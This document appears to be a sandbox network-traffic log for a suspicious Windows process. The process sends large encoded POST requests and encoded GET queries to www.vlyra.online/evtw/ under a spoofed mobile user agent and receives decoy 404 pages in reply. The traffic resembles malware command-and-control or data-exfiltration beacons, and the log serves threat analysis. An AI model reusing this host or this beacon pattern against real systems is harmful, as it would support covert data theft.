Aug 27, 2024 17:50:27.509433031 CEST	1289	IN	Data Raw: 20 64 3d 22 6d 20 34 32 2e 34 32 36 34 30 37 2c 31 35 35 2e 33 38 38 32 35 20 63 20 33 2e 34 31 38 34 2c 30 2e 38 32 35 31 33 20 36 2e 38 33 36 30 38 32 2c 31 2e 36 35 30 30 39 20 31 30 2e 36 30 36 39 39 37 2c 32 2e 31 38 30 33 34 20 33 2e 37 37 Data Ascii: d="m 42.426407,155.38825 c 3.4184,0.82513 6.836082,1.65009 10.606997,2.18034 3.770916,0.53024 7.89657,0.76599 11.608535,0.88382 3.711965,0.11782 7.012548,0.11782 10.429711,0.0589 3.417163,-0.0589 6.953769,-0.17681 10.606588,-0.23572 3.652818,
Aug 27, 2024 17:50:27.510519981 CEST	1289	IN	Data Raw: 74 68 34 36 31 34 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66 69 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 66 Data Ascii: th4614" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <ellipse ry="4.315
Aug 27, 2024 17:50:27.510658026 CEST	1289	IN	Data Raw: 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66 69 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 2d 72 75 6c 65 3a 6e 6f 6e 7a 65 72 6f 3b 73 74 72 6f 6b 65 3a 23 30 30 30 Data Ascii: style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.03816
Aug 27, 2024 17:50:27.674124002 CEST	1289	IN	Data Raw: 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 31 37 30 2e 31 34 35 31 35 2c 2d 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 36 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d Data Ascii: sform="translate(-170.14515,-0.038164)" id="path4610" d="m 318,180.45184 c 0.66667,0 1.33434,0 1.501,0.16616 0.16667,0.16617 -0.16667,0.49951 0.001,0.66667 0.16767,0.16717 0.68771,0.16717 0.89053,0.36949 0.20282,0.202

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.11.20	49862	203.161.42.73	80	5096	C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 17:50:30.036597967 CEST	2578	OUT	POST /evtw/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US Host: www.vlyra.online Origin: http://www.vlyra.online Referer: http://www.vlyra.online/evtw/ Content-Length: 52933 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 6e 4f 6a 30 63 34 59 61 63 54 31 44 59 76 36 73 50 77 6c 65 6a 43 76 6a 6b 52 66 49 78 77 62 6f 44 34 70 59 30 64 32 42 73 46 4d 6e 6f 56 45 74 62 77 6f 4e 67 44 64 53 74 4b 69 6c 56 37 31 75 72 65 44 76 76 71 4d 50 62 47 48 5a 41 43 73 6c 4e 67 52 64 34 67 58 4f 75 2f 74 6b 48 56 57 37 74 6a 74 4f 79 61 75 72 38 2f 48 79 57 6c 75 65 48 69 67 7a 71 77 73 41 30 50 77 36 6b 51 39 6c 47 57 71 45 73 6e 47 31 7a 6f 61 58 6a 4f 57 38 34 36 36 4c 31 75 48 47 4d 71 6c 50 4c 53 7a 63 45 52 4b 45 41 39 55 6f 31 75 6d 30 6d 6f 53 53 35 74 4a 55 53 6c 71 67 57 30 79 38 6b 34 55 5a 4e 4d 52 4c 43 59 70 45 32 78 67 4b 79 71 50 69 6d 5a 41 4f 38 70 39 64 30 6e 4c 44 66 38 4b 44 65 4e 49 47 53 77 6b 2b 41 6f 58 4d 46 63 2b 32 74 5a 71 6b 74 47 68 41 72 42 58 32 39 7a 47 70 71 42 41 74 47 4d 35 33 66 35 4c 53 64 6d 2f 53 73 74 69 4f 30 35 57 36 58 66 4a 58 34 38 6b 77 61 75 65 33 36 47 45 38 33 4c 71 56 71 4f 57 72 34 2f 6b 56 4b 62 58 6c 6e 37 4d 34 65 6a 66 57 74 75 76 5a 37 68 31 43 6d [TRUNCATED] Data Ascii: AvLLLbOh=nOj0c4YacT1DYv6sPwlejCvjkRfIxwboD4pY0d2BsFMnoVEtbwoNgDdStKilV71ureDvvqMPbGHZACslNgRd4gXOu/tkHVW7tjtOyaur8/HyWlueHigzqwsA0Pw6kQ9lGWqEsnG1zoaXjOW8466L1uHGMqlPLSzcERKEA9Uo1um0moSS5tJUSlqgW0y8k4UZNMRLCYpE2xgKyqPimZAO8p9d0nLDf8KDeNIGSwk+AoXMFc+2tZqktGhArBX29zGpqBAtGM53f5LSdm/SstiO05W6XfJX48kwaue36GE83LqVqOWr4/kVKbXln7M4ejfWtuvZ7h1CmKbpJvXxo+QAydKNkYmYTjABPF1pGO30yVOmvYXzWS7A4HtJI+eVAWSPuUllt7ZbLVsOx+ibifa0ldxULQqQDmj2z/8qky2/NgCpro8v7I1AJaL7Cd0wO8iIe332DSpjNt8PPisbNixTIVoLVvPWVSLD02+z57EejYWJL/rX1sRHjilSuWCuyVzGVvfqBqpDJi28QjbKhMWa+Jgw2RTwdk7+k0m//jzgiMBChTupM5EFhu2ZN3uCz4+h/bHYCg1M/7mPGS4K4gjReb47X3/b87yGAbFdoeGc2cxUOXh3fOdYB2RlU1z41UL1Vx3ND8iLiygI9GmRPgprqTVBJK9F6YSIOiraTKsth+HTkdApNXbQWYE97ZZyabIf9KXi9oC3Of/RMWwfoXQHJE6ep3wvIhwE2is1vyMbx85ZQyVkUgfUZqpV4/83D4tehYYrdwbEkSL9yMs5P9lEfI01f58rRkuN9ysBsejfXWI/UgEES0weXMW0hSCZbGSVlm9dRdb9dbGEj3Cmjk2frwGDFAhUnIgJSv2pvESWG0lnJyil3Z1bst92QQejLhnPAsWaTbEn4BALaUUHbWlMqQLBk6eo3trqGcAIlM1e576cM+3nVRh+cA52WBNad2r2J893wmMH+eVLXto/VqumPClAHla8p/XMwF+ot3fvoKm [TRUNCATED]
Aug 27, 2024 17:50:30.036673069 CEST	10312	OUT	Data Raw: 47 4e 69 47 61 70 75 32 6e 44 52 57 74 4d 45 79 48 48 6f 49 2f 2b 41 55 56 62 59 45 5a 58 53 57 41 69 33 70 75 75 6a 42 71 32 50 34 52 39 76 33 34 6c 36 61 42 31 69 51 35 59 59 66 58 66 4d 34 65 58 54 63 75 43 75 73 61 78 55 68 68 47 57 65 61 70 Data Ascii: GNiGapu2nDRWtMEyHHoI/+AUVbYEZXSWAi3puujBq2P4R9v34l6aB1iQ5YYfXfM4eXTcuCusaxUhhGWeapb/Sy1DUocXtH4ILIPvjBKYRJUmBnN91WhU9TpFcofsgQBFH8S+Ye2JP3vZawKqidNiibwxBAJKWVbO7ahFaKHkaVUrXY1Wmajb5Acch1/O0/9pc1GC/dscNLmUjUEvRegvmerZqyYDJbFNom7lKW1ECeadWwI4xlX
Aug 27, 2024 17:50:30.207492113 CEST	2578	OUT	Data Raw: 73 38 62 39 30 65 33 49 69 34 52 74 6f 43 59 55 7a 76 70 51 57 37 38 6e 78 49 37 73 46 7a 45 73 44 58 7a 76 74 46 45 79 76 48 48 42 31 6d 6b 33 42 58 6c 42 62 46 31 69 43 59 33 35 45 4e 79 53 39 32 61 30 42 79 4b 4c 45 73 73 42 4f 42 55 59 37 4f Data Ascii: s8b90e3Ii4RtoCYUzvpQW78nxI7sFzEsDXzvtFEyvHHB1mk3BXlBbF1iCY35ENyS92a0ByKLEssBOBUY7O9pJv1ZpDeth0pNXlFn4zWZ6sNx0PGrz3FzzSrphltF2BTT6x+/fvZxQMsgiM6vtuIAnN+BUQQYD7ERVO0F6sSzscb2TkTcZnwuHOlGwuXedIN+xSMpHdSEZHKhvvnlmHpkWNr/AkaB7LEwgxHh0BIFvrg+dgAGKdb
Aug 27, 2024 17:50:30.207577944 CEST	2578	OUT	Data Raw: 59 51 49 2f 4c 38 5a 4d 36 75 36 58 30 54 76 2b 36 53 71 68 4c 33 74 72 57 48 33 5a 5a 37 4b 47 54 62 2b 4a 53 65 39 5a 6d 7a 46 74 57 47 49 49 6e 35 66 61 48 32 35 6b 78 45 4d 55 47 4d 66 7a 4e 46 72 52 4b 7a 4c 44 39 6e 30 49 4b 54 4e 46 76 6f Data Ascii: YQI/L8ZM6u6X0Tv+6SqhL3trWH3ZZ7KGTb+JSe9ZmzFtWGIIn5faH25kxEMUGMfzNFrRKzLD9n0IKTNFvoQxdvCq5J0NxKww5A2wReKuLueBVtcQGOlJt0BuypO9YxZWMMCj17yMJMDP24MSnO/ev918poFMtjWLNK14oIWHSdKyE4Fv+0y6Uqx4xrEk/bYJLozWSUI5wY/PGuw2FwvvlNsUcghpwCZ0XiwCMHP6JzjEBMZFicI
Aug 27, 2024 17:50:30.207642078 CEST	3867	OUT	Data Raw: 4a 36 7a 7a 6b 4d 43 68 62 55 76 71 52 46 79 67 34 36 69 58 35 68 55 64 45 33 44 78 4c 6b 73 61 62 47 52 36 78 53 45 57 6f 6b 51 5a 30 48 32 4e 53 45 79 6a 61 56 32 57 42 56 49 63 41 6d 63 68 61 4b 74 6f 35 59 78 7a 78 70 59 39 48 31 5a 2f 56 76 Data Ascii: J6zzkMChbUvqRFyg46iX5hUdE3DxLksabGR6xSEWokQZ0H2NSEyjaV2WBVIcAmchaKto5YxzxpY9H1Z/VvsKwnbeEhzTc+Cuek/b28nck8xnzUflI3uv5ei/7IemWBEpVTFNblfTO/6Mso+Iz8YGNU/z7u9l/JWunuQEgo6cBkll7mXRZM64wlQ/Jpe/JByhg8enX0vfcjhUZ0trgaa3GSd9NkDQVHb023KRSpEnXu7z0BoQFjr
Aug 27, 2024 17:50:30.207845926 CEST	6445	OUT	Data Raw: 5a 6b 34 36 2f 78 64 74 36 6f 47 33 46 71 62 42 6c 43 73 5a 57 2b 69 6c 73 63 7a 35 6e 68 6c 6b 58 63 6f 63 6d 7a 31 56 6f 72 37 4d 6a 37 58 57 48 62 64 66 50 31 2f 32 77 7a 77 50 52 66 48 73 36 55 56 34 58 2f 2f 6a 30 33 4a 7a 54 34 7a 6b 66 57 Data Ascii: Zk46/xdt6oG3FqbBlCsZW+ilscz5nhlkXcocmz1Vor7Mj7XWHbdfP1/2wzwPRfHs6UV4X//j03JzT4zkfWXyRFyx/8bWcdVFQ97ylFlIAqnrQK5QRynDl0Ab29LOryy5dCQalgrvBo93JL10Sfk6s1Xg/AIquSc38fC9xyyfBZXo4l9VVO+YfGxMxVmqm08xZwRiiA+E2ZwXd8R/ZJp3+toB5sR0eD93If0pzU1KsluSGpWvi9X
Aug 27, 2024 17:50:30.208039999 CEST	10312	OUT	Data Raw: 7a 44 6d 7a 38 46 4f 68 75 69 77 79 43 58 2f 38 6e 76 77 64 78 4c 54 31 54 36 50 62 53 59 4b 5a 2f 57 75 43 41 78 31 68 67 4d 32 61 70 66 4a 49 4f 72 79 38 76 6b 33 39 72 50 6a 37 36 37 2f 57 68 44 78 65 59 78 79 34 37 42 79 78 57 68 51 6c 39 59 Data Ascii: zDmz8FOhuiwyCX/8nvwdxLT1T6PbSYKZ/WuCAx1hgM2apfJIOry8vk39rPj767/WhDxeYxy47ByxWhQl9Y4T+Tfxfzf/5w8LeRgfz7rRwC0kr2dgB4Mul2aP1w3TMgxfpQCIuTRxz3St/r8aPCBVi0y5I0gkFpl/seRqRPYt18kX7zuUc7y8w+qHfGnFgMVzkcNkMwK0JFFoww0wZteYUrlW49ORQDN13LllGHa85MlgJhgNDpk
Aug 27, 2024 17:50:30.373867035 CEST	2578	OUT	Data Raw: 67 63 35 4c 2b 69 44 70 76 77 32 47 67 42 4a 52 4f 47 4d 42 77 42 6c 30 31 30 63 4c 70 69 55 52 39 78 5a 4f 72 57 6d 52 43 65 72 5a 54 6d 56 68 32 70 44 47 32 63 2f 51 5a 6c 4b 71 5a 54 6b 51 49 47 4e 2f 4d 63 61 79 2f 6e 54 33 4d 79 35 6f 45 4e Data Ascii: gc5L+iDpvw2GgBJROGMBwBl010cLpiUR9xZOrWmRCerZTmVh2pDG2c/QZlKqZTkQIGN/Mcay/nT3My5oENFvjBDq2hBOd8vfHHlNtVaX2wEH4o3TjH7yeNJaNZYoIxP0Fj1MoGakQR1zkRWDJzSjgLjwOo5TaEmy4ATs+d+lqhhLqIe+AjJNhmNWWbB77CSPJ6/oz9WMhZUM9kSK0u8uOa6oxwH9xMDBxbtjfdFWglsQGDFlnqf
Aug 27, 2024 17:50:30.373887062 CEST	3867	OUT	Data Raw: 54 2f 79 52 57 6f 77 4a 48 53 6a 6c 6e 73 54 59 4a 31 71 78 44 33 2b 68 33 51 2f 57 32 5a 43 37 64 4e 64 66 2f 59 61 38 36 57 76 4e 2b 2f 4e 39 4f 73 76 74 46 4f 77 48 5a 2f 4c 7a 52 6b 62 33 38 73 79 49 70 65 50 35 4c 6b 32 2f 75 6a 69 78 2b 50 Data Ascii: T/yRWowJHSjlnsTYJ1qxD3+h3Q/W2ZC7dNdf/Ya86WvN+/N9OsvtFOwHZ/LzRkb38syIpeP5Lk2/ujix+PHGfo+rXl5iYp6XMz544js9Aqe7Ku4uOYu/ZtUDv/buQ3HinEYPQ8jpGlJ+Jayajt26HRbWPyzBO9RjS4sPpUmv0OK377GK6cssucXyxzWvDBUdpgVK5e7EuMd7WJgzP1LfscaqQrABHoIqF/v3Cq+kXD26PafZ63X
Aug 27, 2024 17:50:30.373965025 CEST	5156	OUT	Data Raw: 62 61 78 59 75 63 57 6c 5a 6a 6e 32 6e 50 65 4f 35 54 56 69 77 51 73 66 33 75 55 69 2f 47 45 65 78 6a 43 51 36 2b 34 36 75 39 63 49 41 70 4d 5a 37 35 43 4a 67 4a 75 4d 67 6f 75 69 57 31 78 69 77 6b 6e 51 43 57 32 2f 32 57 4d 68 50 39 75 52 58 38 Data Ascii: baxYucWlZjn2nPeO5TViwQsf3uUi/GEexjCQ6+46u9cIApMZ75CJgJuMgouiW1xiwknQCW2/2WMhP9uRX8MmdnpKS8bnPye3fQ8cxRtm1h9tDUyEh4T8IWAoHP/F8tilIJEnHy01nKeoV0NyNcGT269e4+Cv+gbfvX2ILREAXW5oUzjPLxqINJ/mHAhKu5m3JH6W0IUz0/RZwg0nnSgUc+OUkteGKhP6uvj32OC+Mxommzp7QEW
Aug 27, 2024 17:50:30.374138117 CEST	3254	OUT	Data Raw: 4b 2b 6f 57 51 4b 6e 73 2f 2b 55 6f 4b 35 6e 63 72 52 37 57 58 64 72 57 44 46 49 46 33 62 50 75 4d 36 77 67 34 6e 45 50 49 4c 6f 66 67 59 49 38 58 65 57 44 73 77 44 49 38 4c 4b 67 55 2f 74 43 62 72 4d 75 6f 6a 2b 67 69 46 77 57 68 4d 79 41 72 52 Data Ascii: K+oWQKns/+UoK5ncrR7WXdrWDFIF3bPuM6wg4nEPILofgYI8XeWDswDI8LKgU/tCbrMuoj+giFwWhMyArR/CZse9HbsfwPUlewvJ81oufQEPvLWBewiQi2S4tZQ8zlAfiLD6R4Tq+6sMu0gwlOCX5TLgwG3xDWsKATI3MTkUYFlq/cQSONL1On5xwRuTRwAegKpAltnU2/H1svKFRGt/oPgVc6Pli15vtH4j3Jt6t7TxmCGtqRG
Aug 27, 2024 17:50:30.566690922 CEST	1289	IN	HTTP/1.1 404 Not Found Date: Tue, 27 Aug 2024 15:50:30 GMT Server: Apache Content-Length: 16052 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.11.20	49863	203.161.42.73	80	5096	C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 17:50:32.735111952 CEST	525	OUT	GET /evtw/?AvLLLbOh=qMLUfIVxcy5BUPOFUVVokgWijQnF2zXXVKt01YDq7Fx24AU1CDxJrzkqkKWLAIZ/xY36wLggT1PRMlR6dRNA0wLKv5lzUDW7qQMZ0amG/MTffFaAFzA5nlM=&7RB=66nPyLG8 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Host: www.vlyra.online Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Aug 27, 2024 17:50:32.911341906 CEST	1289	IN	HTTP/1.1 404 Not Found Date: Tue, 27 Aug 2024 15:50:32 GMT Server: Apache Content-Length: 16052 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
Aug 27, 2024 17:50:32.911415100 CEST	1289	IN	Data Raw: 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c 61 79 65 72 31 22 3e 0a 20 20 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 67 36 32 31 39 22 0a 20 Data Ascii: "translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="display:inline;fill:#000000;fill-opacity:1
Aug 27, 2024 17:50:32.911467075 CEST	1289	IN	Data Raw: 39 39 20 7a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 30 2e 32 Data Ascii: 99 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4496" d="m 85.115421,100.5729 c -0.00
Aug 27, 2024 17:50:32.911570072 CEST	1289	IN	Data Raw: 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 30 30 31 35 37 34 37 35 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 34 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 Data Ascii: roke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path id="path4513" d="m 74.6875,125.03748 c -8.394789,7.68654 -16.790624,15.37405 -23.988969,22.38484 -7.198345,7.0108 -
Aug 27, 2024 17:50:32.911737919 CEST	1289	IN	Data Raw: 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e Data Ascii: ay:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4521" d="m 96.8125,126.22498 c 6.89586,6.45836 13.7917,12.9167 19.98957,19.14
Aug 27, 2024 17:50:32.911751032 CEST	1289	IN	Data Raw: 32 33 2e 36 36 32 34 38 20 63 20 36 2e 31 35 39 38 38 35 2c 31 31 2e 35 31 37 37 31 20 31 32 2e 33 31 39 39 36 2c 32 33 2e 30 33 35 37 37 20 31 36 2e 38 33 37 32 34 2c 33 31 2e 37 38 39 30 34 20 34 2e 35 31 37 32 38 2c 38 2e 37 35 33 32 37 20 37 Data Ascii: 23.66248 c 6.159885,11.51771 12.31996,23.03577 16.83724,31.78904 4.51728,8.75327 7.29964,14.54985 9.24424,18.32123 1.9446,3.77138 3.00519,5.42118 4.1838,9.19262 1.17861,3.77144 2.47477,9.6631 1.94443,23.80647 -0.53034,14.14338 -2.88706,36.5322
Aug 27, 2024 17:50:32.911881924 CEST	1289	IN	Data Raw: 34 31 32 34 38 32 2c 31 39 2e 34 34 35 38 35 20 31 2e 30 30 31 37 31 31 2c 33 36 2e 38 38 37 30 31 20 31 2e 35 39 30 39 39 39 2c 35 34 2e 33 32 39 39 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 Data Ascii: 412482,19.44585 1.001711,36.88701 1.590999,54.32995" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4545"
Aug 27, 2024 17:50:32.911897898 CEST	1289	IN	Data Raw: 36 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 34 32 2e 34 32 36 34 30 37 2c 31 35 35 2e 33 38 38 32 35 20 63 20 33 2e 34 31 38 34 2c 30 2e 38 32 35 31 33 20 36 2e 38 33 36 30 38 32 2c 31 2e 36 35 30 30 39 20 31 30 2e 36 30 36 39 Data Ascii: 6" d="m 42.426407,155.38825 c 3.4184,0.82513 6.836082,1.65009 10.606997,2.18034 3.770916,0.53024 7.89657,0.76599 11.608535,0.88382 3.711965,0.11782 7.012548,0.11782 10.429711,0.0589 3.417163,-0.0589 6.953769,-0.17681 10.606588,-0.
Aug 27, 2024 17:50:32.912084103 CEST	1289	IN	Data Raw: 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 36 31 34 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66 Data Ascii: id="path4614" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <ellipse
Aug 27, 2024 17:50:32.912097931 CEST	1289	IN	Data Raw: 30 2e 31 33 30 31 20 7a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66 69 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 2d 72 75 6c 65 3a 6e 6f 6e 7a Data Ascii: 0.1301 z" style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path transform="translate(-170
Aug 27, 2024 17:50:33.078614950 CEST	1289	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 31 37 30 2e 31 34 35 31 35 2c 2d 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 36 31 30 22 0a Data Ascii: transform="translate(-170.14515,-0.038164)" id="path4610" d="m 318,180.45184 c 0.66667,0 1.33434,0 1.501,0.16616 0.16667,0.16617 -0.16667,0.49951 0.001,0.66667 0.16767,0.16717 0.68771,0.16717 0.89053,0.3694

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
